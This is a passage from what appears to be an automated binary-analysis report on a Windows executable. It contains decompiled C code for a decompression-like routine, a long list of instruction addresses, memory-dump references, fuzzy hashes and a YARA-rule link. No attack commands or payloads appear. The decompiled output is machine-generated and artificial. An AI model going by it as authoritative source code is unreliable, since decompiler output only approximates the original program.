												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406354
0x00406354
0x00406354
0x00406354
0x00406354
0x00406358
0x00000000
0x00000000
0x0040635e
0x0040635e
0x00406361
0x00406364
0x00406369
0x0040636b
0x0040636e
0x00406371
0x00406374
0x00406374
0x00406377
0x00000000
0x00000000
0x00406379
0x00406379
0x0040637c
0x00406381
0x00406383
0x00406386
0x0040638c
0x004060eb
0x004060eb
0x004060ee
0x004060f4
0x004060fa
0x00406103
0x00406109
0x0040610c
0x00406113
0x00406118
0x0040611e
0x00406129
0x00406129
0x00406392
0x00406392
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a2
0x004063a6
0x004063a9
0x004063a9
0x004063ad
0x004063b3
0x004063b3
0x004063b6
0x004063b9
0x004063bf
0x00000000
0x00000000
0x004063c1
0x004063e3
0x004063e3
0x004063e6
0x00000000
0x00000000
0x004063c3
0x004063c7
0x00000000
0x00000000
0x004063cd
0x004063cd
0x004063d0
0x004063d3
0x004063d8
0x004063da
0x004063dd
0x004063e0
0x004063e0
0x004063e8
0x004063e8
0x004063ee
0x004063f1
0x004063f4
0x004063f4
0x004063fb
0x004063ff
0x00406403
0x00406406
0x00406409
0x0040640f
0x00406414
0x00000000
0x00000000
0x00406416
0x0040642a
0x0040642a
0x0040642e
0x00000000
0x00000000
0x00406418
0x0040641b
0x0040641b
0x00406422
0x00406427
0x00406427
0x00406427
0x00406430
0x00406430
0x00406433
0x00406441
0x00406447
0x0040644c
0x00406452
0x00406458
0x0040645e
0x00406465
0x00406479
0x00406479
0x00406a48
0x00406a48
0x00406a48
0x00406a4d
0x00000000
0x00000000
0x00406085
0x00406085
0x00000000
0x00406680
0x00406680
0x00406684
0x00406687
0x0040668a
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406693
0x004066b8
0x004066b8
0x004066b8
0x004066ba
0x00000000
0x00000000
0x00406698
0x00406698
0x0040669c
0x00000000
0x00000000
0x004066a2
0x004066a2
0x004066a5
0x004066a8
0x004066ab
0x004066ad
0x004066af
0x004066b2
0x004066b5
0x004066b5
0x004066b5
0x004066bc
0x004066bc
0x004066c4
0x004066c7
0x004066ca
0x004066cd
0x004066d1
0x004066d4
0x004066d6
0x004066d9
0x004066db
0x004066ef
0x004066ef
0x004066f2
0x0040670c
0x0040670c
0x0040670f
0x00000000
0x00000000
0x00406715
0x00406715
0x00406718
0x00000000
0x00000000
0x0040671e
0x0040671e
0x00000000
0x0040671e
0x004066f4
0x004066f7
0x004066fe
0x00406701
0x00000000
0x00406701
0x004066dd
0x004066e1
0x004066e4
0x00000000
0x00000000
0x00406729
0x00406729
0x0040674e
0x0040674e
0x0040674e
0x00406750
0x00000000
0x00000000
0x0040672e
0x0040672e
0x00406732
0x00000000
0x00000000
0x00406738
0x00406738
0x0040673b
0x0040673e
0x00406741
0x00406743
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674b
0x00406752
0x0040675a
0x0040675d
0x00406760
0x00406762
0x00406765
0x00406765
0x00406767
0x0040676b
0x0040676e
0x00406771
0x00406774
0x00000000
0x00000000
0x0040677a
0x0040677a
0x0040679f
0x0040679f
0x0040679f
0x004067a1
0x00000000
0x00000000
0x0040677f
0x0040677f
0x00406783
0x00000000
0x00000000
0x00406789
0x00406789
0x0040678c
0x0040678f
0x00406792
0x00406794
0x00406796
0x00406799
0x0040679c
0x0040679c
0x0040679c
0x004067a3
0x004067a3
0x004067ab
0x004067ae
0x004067b1
0x004067b4
0x004067b8
0x004067bb
0x004067bd
0x004067c0
0x004067c3
0x004067dd
0x004067dd
0x004067e0
0x00000000
0x00000000
0x004067e6
0x004067e6
0x004067e9
0x004067f0
0x00000000
0x004067f0
0x004067c5
0x004067c8
0x004067cf
0x004067d2
0x00000000
0x00000000
0x004067f8
0x004067f8
0x0040681d
0x0040681d
0x0040681d
0x0040681f
0x00000000
0x00000000
0x004067fd
0x004067fd
0x00406801
0x00000000
0x00000000
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00406810
0x00406812
0x00406814
0x00406817
0x0040681a
0x0040681a
0x0040681a
0x00406821
0x00406829
0x0040682c
0x0040682f
0x00406831
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x0040683c
0x0040683c
0x0040683f
0x00406844
0x00406846
0x0040684c
0x0040684e
0x00406863
0x00406865
0x00406865
0x00406850
0x00406856
0x00406858
0x0040685a
0x0040685a
0x00406867
0x0040686b
0x0040686e
0x00406874
0x00406874
0x00406877
0x00406877
0x00406877
0x00406879
0x00000000
0x00000000
0x0040687f
0x0040687f
0x00406885
0x00406887
0x004068ac
0x004068af
0x004068b5
0x004068ba
0x004068c0
0x004068c6
0x004068c8
0x004068cb
0x004068d4
0x004068da
0x004068da
0x004068cd
0x004068cf
0x004068d1
0x004068d1
0x004068dc
0x004068e2
0x004068e4
0x004068e7
0x004068e9
0x004068ef
0x004068f1
0x004068f3
0x004068f5
0x004068f7
0x004068fa
0x00406903
0x00406906
0x00406906
0x004068fc
0x004068fc
0x004068ff
0x004068ff
0x004068fa
0x004068f1
0x00406908
0x0040690a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040690a
0x00406889
0x00406889
0x0040688f
0x00406895
0x00406897
0x00000000
0x00000000
0x00406899
0x00406899
0x0040689b
0x0040689d
0x004068a6
0x004068a6
0x0040689f
0x0040689f
0x004068a2
0x004068a2
0x004068a8
0x004068aa
0x00000000
0x00000000
0x00406910
0x00406910
0x00406915
0x00406917
0x00406918
0x00406919
0x0040691a
0x00406920
0x00406923
0x00406926
0x00406929
0x0040692b
0x00406931
0x00406931
0x00406934
0x00406934
0x00406934
0x00406934
0x0040693d
0x00000000
0x00000000
0x00406942
0x00406942
0x00406945
0x00406948
0x0040694a
0x004069e1
0x004069e1
0x004069e4
0x004069e6
0x004069e7
0x004069e8
0x004069eb
0x00000000
0x004069eb
0x00406950
0x00406950
0x00406956
0x00406958
0x0040697d
0x00406980
0x00406986
0x0040698b
0x00406991
0x00406997
0x00406999
0x0040699c
0x004069a5
0x004069ab
0x004069ab
0x0040699e
0x004069a0
0x004069a2
0x004069a2
0x004069ad
0x004069b3
0x004069b5
0x004069b8
0x004069ba
0x004069c0
0x004069c2
0x004069c4
0x004069c6
0x004069c8
0x004069cb
0x004069d4
0x004069d7
0x004069d7
0x004069cd
0x004069cd
0x004069d0
0x004069d0
0x004069cb
0x004069c2
0x004069d9
0x004069db
0x00000000
0x00000000
0x00000000
0x00000000
0x004069db
0x0040695a
0x0040695a
0x00406960
0x00406966
0x00406968
0x00000000
0x00000000
0x0040696a
0x0040696a
0x0040696c
0x0040696e
0x00406975
0x00406975
0x00406977
0x00406970
0x00406970
0x00406972
0x00406972
0x00406979
0x0040697b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f3
0x004069f3
0x004069f6
0x004069f8
0x004069fb
0x004069fe
0x004069fe
0x004069fe
0x004069fe
0x00000000
0x00000000
0x00000000
0x004060ac
0x00406090
0x00000000
0x00406096
0x00406099
0x004060a3
0x004060a6
0x004060a9
0x00000000
0x004060a9
0x00406090
0x004060b4
0x004060b7
0x004060bb
0x004060c5
0x004060cf
0x004060d2
0x004060d8
0x0040620c
0x0040620e
0x00406214
0x00406217
0x0040621a
0x00000000
0x0040621a
0x004060de
0x004060de
0x004060df
0x00406137
0x00406137
0x0040613e
0x004061e4
0x004061e4
0x004061e9
0x004061ec
0x004061f1
0x004061f4
0x004061f9
0x004061fc
0x00406201
0x00406204
0x00406204
0x00000000
0x00406144
0x00406144
0x00406144
0x00406144
0x00406148
0x00406148
0x0040616a
0x0040616d
0x0040616f
0x00406172
0x00406177
0x0040614d
0x0040614d
0x00406152
0x00406154
0x00406156
0x0040615b
0x00406161
0x00406166
0x00406168
0x00406168
0x0040615d
0x0040615d
0x0040615d
0x0040615b
0x00000000
0x00406179
0x004061a6
0x004061ab
0x004061ad
0x004061ae
0x004061b0
0x004061b1
0x004061b1
0x004061b1
0x004061d9
0x004061de
0x004061de
0x00000000
0x004061de
0x00406177
0x0040613e
0x004060e1
0x004060e1
0x004060e2
0x0040612c
0x00000000
0x0040612c
0x004060e4
0x004060e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00406241
0x00406241
0x00406241
0x00406244
0x00000000
0x00000000
0x00406221
0x00406221
0x00406225
0x00000000
0x00000000
0x0040622b
0x0040622b
0x0040622e
0x00406231
0x00406236
0x00406238
0x0040623b
0x0040623e
0x0040623e
0x0040623e
0x00406246
0x00406246
0x00406249
0x0040624b
0x00406250
0x00406253
0x00406255
0x00406258
0x00000000
0x00000000
0x0040625e
0x0040625e
0x00406260
0x00000000
0x00000000
0x00406266
0x00406266
0x0040626a
0x00000000
0x00000000
0x00406270
0x00406270
0x00406273
0x00406275
0x00406313
0x00406313
0x00406316
0x00406318
0x00406318
0x0040631b
0x0040631e
0x00406320
0x00406322
0x00406324
0x00406324
0x0040632d
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633e
0x0040633e
0x0040633e
0x00406341
0x00406347
0x00406347
0x0040634d
0x0040634d
0x0040634d
0x00000000
0x00406341
0x0040627b
0x0040627b
0x00406281
0x00406284
0x00406286
0x004062b1
0x004062b4
0x004062ba
0x004062bf
0x004062c5
0x004062cb
0x004062cd
0x004062d0
0x004062d9
0x004062df
0x004062df
0x004062d2
0x004062d4
0x004062d6
0x004062d6
0x004062e1
0x004062e7
0x004062ea
0x004062ec
0x004062ee
0x004062f4
0x004062f6
0x004062f8
0x004062fb
0x00406304
0x00406304
0x00406306
0x004062fd
0x004062fd
0x00406300
0x00406300
0x00406308
0x00406308
0x004062f6
0x0040630b
0x0040630d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406288
0x00406288
0x0040628e
0x00406294
0x00406296
0x00000000
0x00000000
0x00406298
0x00406298
0x0040629a
0x0040629c
0x0040629f
0x004062a6
0x004062a6
0x004062a8
0x004062a1
0x004062a1
0x004062a3
0x004062a3
0x004062aa
0x004062ac
0x004062af
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004063b3
0x004063b6
0x004063b9
0x004063bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00406596
0x00406596
0x00406596
0x00406599
0x0040659c
0x0040659e
0x004065a1
0x004065a7
0x004065ae
0x004065b0
0x00000000
0x00000000
0x00406484
0x00406484
0x004064ac
0x004064ac
0x004064ac
0x004064ae
0x00000000
0x00000000
0x0040648c
0x0040648c
0x00406490
0x00000000
0x00000000
0x00406496
0x00406496
0x00406499
0x0040649c
0x0040649f
0x004064a1
0x004064a3
0x004064a6
0x004064a9
0x004064a9
0x004064a9
0x004064b0
0x004064b0
0x004064b8
0x004064bb
0x004064c1
0x004064c4
0x004064c8
0x004064cc
0x004064cf
0x004064d2
0x004064ea
0x004064ea
0x004064ed
0x004064fb
0x004064fe
0x004064ef
0x004064ef
0x004064f1
0x004064f8
0x004064f8
0x00406527
0x00406527
0x00406527
0x0040652a
0x0040652c
0x00000000
0x00000000
0x00406507
0x00406507
0x0040650b
0x00000000
0x00000000
0x00406511
0x00406511
0x00406514
0x00406517
0x0040651a
0x0040651c
0x0040651e
0x00406521
0x00406524
0x00406524
0x00406524
0x0040652e
0x0040652e
0x00406530
0x00406532
0x0040653d
0x00406540
0x00406543
0x00406545
0x00406547
0x00406549
0x0040654c
0x0040654f
0x00406554
0x00406557
0x0040655a
0x0040655d
0x00406564
0x00406567
0x00406569
0x00000000
0x00000000
0x0040656f
0x0040656f
0x00406573
0x00406584
0x00406584
0x00406584
0x00406586
0x00406586
0x0040658a
0x0040658a
0x0040658a
0x0040658c
0x0040658d
0x00406590
0x00406590
0x00406590
0x00406593
0x00000000
0x00406593
0x00406575
0x00406575
0x00406578
0x00000000
0x00000000
0x0040657e
0x0040657e
0x00000000
0x0040657e
0x004064d4
0x004064d4
0x004064d6
0x004064d8
0x004064db
0x004064de
0x004064e2
0x004064e2
0x004065b6
0x004065b6
0x004065b9
0x004065c0
0x004065c4
0x004065c6
0x004065c9
0x004065cc
0x004065d1
0x004065d4
0x004065d6
0x004065d7
0x004065da
0x004065e5
0x004065e8
0x004065ff
0x00406604
0x0040660b
0x00406610
0x00406614
0x00406616
0x00406616
0x00406616
0x00406619
0x0040661b
0x00000000
0x00406621
0x00406621
0x00406625
0x00406630
0x00406643
0x00406648
0x0040664d
0x0040664f
0x00000000
0x00000000
0x00406655
0x00406655
0x00406658
0x0040665a
0x00406668
0x00406668
0x0040666b
0x0040666b
0x0040666e
0x00406671
0x00406674
0x00406677
0x0040667a
0x0040667d
0x00000000
0x0040667d
0x0040665c
0x0040665c
0x00406662
0x00000000
0x00000000
0x00000000
0x00406662
0x00000000
0x00000000
0x00000000
0x00406a01
0x00406a01
0x00406a07
0x00406a0d
0x00406a12
0x00406a18
0x00406a1e
0x00406a20
0x00406a23
0x00406a2c
0x00406a32
0x00406a32
0x00406a25
0x00406a27
0x00406a29
0x00406a29
0x00406a34
0x00406a36
0x00406a39
0x00406a74
0x00406a74
0x00000000
0x00406a3b
0x00406a3b
0x00406a3b
0x00406a41
0x00406a44
0x00406a46
0x00406a7b
0x00406a7d
0x00000000
0x00406a7d
0x00000000
0x00406a46
0x00000000
0x00406085
0x00406a53
0x00000000
0x00406a53
0x00406467
0x00406469
0x00000000
0x00000000
0x0040646b
0x0040646b
0x0040646e
0x00000000
0x0040646e
0x004063b3
0x00406374
0x00406a58
0x00406a5b
0x00406a5d
0x00406a66
0x00406a6c
0x00000000

Memory Dump Source

Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00406B2B, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
